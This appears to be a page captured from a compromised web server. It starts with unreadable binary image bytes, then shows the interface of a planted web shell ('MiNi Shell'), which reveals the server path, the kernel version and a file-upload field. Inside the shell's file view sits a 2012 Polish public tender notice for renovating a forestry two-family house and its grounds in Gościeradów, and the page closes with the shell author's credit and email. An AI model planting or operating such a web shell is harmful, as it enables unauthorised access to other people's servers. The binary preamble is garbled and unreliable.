JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121116/455278-N-2012.html

<p class="kh_header"><b>Gościeradów: Modernizacja osady 2-rodzinnej w Gościeradowie  nr inw. 110/252  - I etap</b><br>
<b>Numer ogłoszenia: 455278 - 2012; data zamieszczenia: 16.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Gościeradów , ul. Folwark 1e, 23-275 Gościeradów, woj. lubelskie, tel. 015 8381174, faks 015 8381102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lublin.lasy.gov.pl/web/goscieradow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja osady 2-rodzinnej w Gościeradowie  nr inw. 110/252  - I etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje: 
Dach
- rozebranie porycia dachu z płyt  eternitowych , utylizacja eternitu
- rozebranie obróbek blacharskich, rynien rur spustowych , parapetów podokiennych
- rozebranie istniejącego ołacenia 
- przemurowanie kominów cegłą klinkierową 
- założenie włazu dachowego systemowego
- ułożenie membrany paro-przepuszczalnej na krokwiach
- ołacenie połaci kontrłatami, wykonanie nowej deski czołowej , wiatrownic
- ołacenie łatami połaci dachowej pod pokrycie z blachy dachówkowej , wykonanie  
  obróbek blacharskich , założenie rynien rur  spustowych , gąsiorów , wiatrownic
- docieplenie strychu wełną mineralną 
- wykonanie podsufitki z boazerii
DOCIEPLENIE  ELEWACJI
- przygotowanie powierzchni elewacji poprzez skucie uszkodzonych tynków ,    
  szczotkowanie powłok malarskich , przemycie środkiem  wzmacniającym - unigruntem
- przyklejenie styropianu w technologii lekkiej mokrej , wykonanie wypraw zewnętrznych     
   z  zastosowaniem tynku drobnoziarnistego  1,5 mm mineralnego malowanego farbami 
   fasadowymi
- odkopanie ścian przyziemia do poziomu ław fundamentowych
- oczyszczenie tynków zewnętrznych ścian przyziemia ewentualne uzupełnienie 
   uszkodzonych tynków , rapówki
- wykonanie izolacji powłokowej pionowej na ścianach zewnętrznych przyziemia z  
   zastosowaniem powłok dyspersyjnych 2 X
- przyklejenie styropianu EPS 40-70 gr 10 cm z zastosowaniem kleju dyspersyjnego  
- zabezpieczenie styropianu warstwą kleju oraz siatką z włókna szklanego 
- wykonanie wypraw elewacyjnych na cokole z tynku mozaikowego 
- zasypanie ścian przyziemia piaskiem oraz gruntem z wcześniejszego odspojenia 
- wykonanie opaski kapilarnej z kostki brukowej betonowej gr. 6 cm kolor brąz
- naprawa uszkodzonych balkonów , tarasu schodów zewnętrznych 
- obłożenie : schodów ,balkonów , tarasu  płytkami terakotowymi mrozoodpornymi 
   antypoślizgowymi
- wymiana barier ( poręczy) przy schodach , balkonach , tarasie
WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ 
- wykucie z  muru ościeżnic okiennych i drzwiowych 
- osadzenie nowej stolarki okiennej i drzwiowej drewnianej ,ewentualne poszerzenie  
   otworów drzwiowych
- uzupełnienie uszkodzonych tynków ościeży 
- zamontowanie parapetów wewnętrznych podokiennych z konglomeratu marmurowego   
  gr. 2,5 cm
- zamontowanie parapetów zewnętrznych z blachy powlekanej gr 07 mm
ROBOTY WEWNĘTRZNE 
- skucie uszkodzonych tynków wewnętrznych w pomieszczeniach piwnicznych , 
  uzupełnienie tynków z zastosowaniem tynków homofobowych , pomalowanie farbami 
  wodoprzepuszczalnymi 
- rozebranie trzonów kuchennych w kuchni na parterze i piwnicy
- przebudowa ścianki działowej w łazience na parterze 
- uzupełnienie tynków w miejscu robót rozbiórkowych , po przekuciach instalacyjnych,  
  skucie glazur w łazienkach
- rozebranie podłóg z desek sosnowych , schodów wewnętrznych drewnianych
- wykonanie izolacji posadzkowej z warstwy styropianu , folii
- wykonanie podkładów pod posadzki  z zaprawy cementowej 
- uzupełnienie tynków na ścianach w łazienkach pod glazurę 
- wykonanie nowych okładzin ściennych z płytek glazurowych , oraz posadzek z płytek  
  terakotowych w łazienkach, korytarzach ,  kuchni, piwnicy
- wykonanie posadzek w pokojach z parkietu dębowego gr. 22 mm
- wykonanie nowych schodów : stopni podstopnic balustrad z drewna dębowego
- wykonanie obłożenia sufitów poddasza z płyt gipsowo-kartonowych 
- wykonanie gładzi gipsowych na ścianach i sufitach pomieszczeń parteru, poddasza
- pomalowanie pomieszczeń farbami emulsyjnymi
ROBOTY DROGOWE
-wykonanie koryta pod drogę dojazdową , z wywiezieniem urobku na odległość do 1 km
- wykonanie warstwy odsączającej z pasku  gr.15 cm
- wykonanie podbudowy z tłucznia gr. 15 cm 
- ulżenie drogi dojazdowej z płyt ażurowych jomba
- plantowanie terenu 
OGRODZENIE TERENU
- rozebranie istniejącego ogrodzenia z elementów panelowych  oraz siatki
- wykonanie nowego ogrodzenia z elementów panelowych systemowych
- wykonanie nowego cokołu od strony frontowej z elementów prefabrykowanych (  
  podwalina żelbetowa , słupki stalowe z profili zamkniętych 70 x 70 x 4 mm
- wykonanie fundamentu pod bramę rozsuwaną oraz furtkę 
- montaż bramy , furtki 
- ułożenie w wykopie przewodu zasilającego bramę , furtkę
- montaż siłowników do otwierania bramy rozsuwanej 
- montaż instalacji zasilającej mechanizmy otwierania oraz domofonu 
- odwiezienie na wysypisko gruzu oraz materiałów rozbiórkowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% kwoty zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień w okresie 3 lat od daty udzielenia zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.22.30.00-6, 45.40.00.00-1, 45.33.00.00-9, 45.33.00.00-0, 45.33.10.00-6, 45.33.11.00-7, 45.33.24.00-7, 45.23.32.25-2, 45.23.32.23-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości: 10 000 zł (słownie: dziesięć tysięcy zł ),  które może być wnoszone w:
  - pieniądzu,
  - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z   
    tym że poręczenie kasy jest zawsze - poręczeniem pieniężnym,
  - poręczeniach i gwarancjach bankowych,
  - gwarancjach ubezpieczeniowych,
  - poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r nr 42, poz. 275, z 2008 r. nr 116 poz.730 i 732, nr 227 poz. 1505 oraz z 2010 nr 96 poz. 620).
2. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy   
    Zamawiającego: BGŻ O/Stalowa Wola 78 2030 0045 1110 0000 0058 7200. W tytule przelewu należy wpisać: [wadium - Modernizacja osady 2-rodzinnej w leśnictwie Dąbrowa  nr inw. 110/252 etap I ].
3. W przypadku wniesienia wadium w formie innej niż pieniądze - oryginał należy złożyć w kasie    
    Zamawiającego pokój nr 10 lub załączyć do oferty, w sposób, który pozwoli bez zdekompletowania oferty zwrócić oryginał dokumentu Wykonawcy.
4. Wykonawca dołączy do oferty kopię wniesienia wadium, 
5. Wadium musi być wniesione przed upływem terminu składania ofert. Wykonawca, który nie wniósł 
    wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
6. Wykonawcy, którzy wnieśli wadium nie stanowiące całości wymaganej kwoty lub, gdy forma jest   
    niezgodna z rozdziałem IX pkt 1 SIWZ - będą wykluczeni.
7. Zamawiający zwraca wszystkim Wykonawcom niezwłocznie wadium po wyborze oferty najkorzystniejszej (z wyjątkiem Wykonawcy którego oferta została wybrana jako najkorzystniejsza) lub       
    unieważnieniu postępowania z zastrzeżeniem ust.12 poniżej.
8. Zamawiający zwraca wadium:
    - Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy 
      w sprawie zamówienia oraz wniesieniu zabezpieczenia należytego wykonania umowy,
    - na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
9. Zamawiający żąda ponownego wniesienia wadium, które zwrócono Wykonawcy na podstawie ust. 7 powyżej, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania, jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z 
    umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty     
    prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy    
    wskazany przez Wykonawcę.
11.Wykonawca traci wadium na rzecz Zamawiającego, jeżeli:
   - odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
   - nie wniesie zabezpieczenia należytego wykonania umowy,
   - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po   
     stronie Wykonawcy.
12.Zamawiający także zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca na wezwanie Zamawiającego nie uzupełni wymaganych oświadczeń i dokumentów na okoliczność spełnienia warunków udziału w postępowaniu lub pełnomocnictw, chyba że Wykonawca udowodni, że wynika to z przyczyn niezależnych od niego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres    
       prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch zadań w zakresie budowy, przebudowy lub remontu budynków  o wartości min. 500 tysięcy zł każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) dysponowania osobą posiadającą uprawnienia budowlane  w specjalności  konstrukcyjno - budowlanej  bez ograniczeń (branża budowlana)  lub odpowiadającymi im uprawnieniami wydanymi obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz. U. z 2010 r. nr .243 poz. 1623 ze zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63 poz.394),
     2) dysponowanie co najmniej 5 osobami wraz z informacją na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także o podstawie dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują środkami własnymi lub zdolnością kredytową na kwotę nie mniejszą niż 500 tysięcy zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) dokumenty umożliwiające ustalenie pełnego składu urzędujących władz Wykonawcy oraz prawnej reprezentacji Wykonawcy, tj. aktualny odpis z właściwego rejestru, aktualną informację z Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG),  umowa spółki.  (Niniejsze dokumenty traktowane będą jak pełnomocnictwo i powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
2) kosztorys ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w umowie poza przypadkami określonymi w § 2 ust.2 i  w § 11 ust. 5 również  w przypadku:
    1) niedopełnienia przez Zamawiającego jego obowiązków wynikających z umowy,
    2) przerwania lub zawieszenia realizacji  robót z przyczyn nie zawinionych przez Wykonawcę,
    3) wystąpienia zdarzenia o charakterze siły wyższej uniemożliwiającego  wykonanie zamówienia w 
        terminie umownym,
    4) zajścia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, 
    5) decyzji organów administracji publicznej i samorządowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lublin/nadl_goscieradow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 23-275 Gościeradów
ul. Folwark 1E
pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 10:00, miejsce: 23-275 Gościeradów
ul. Folwark 1E
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com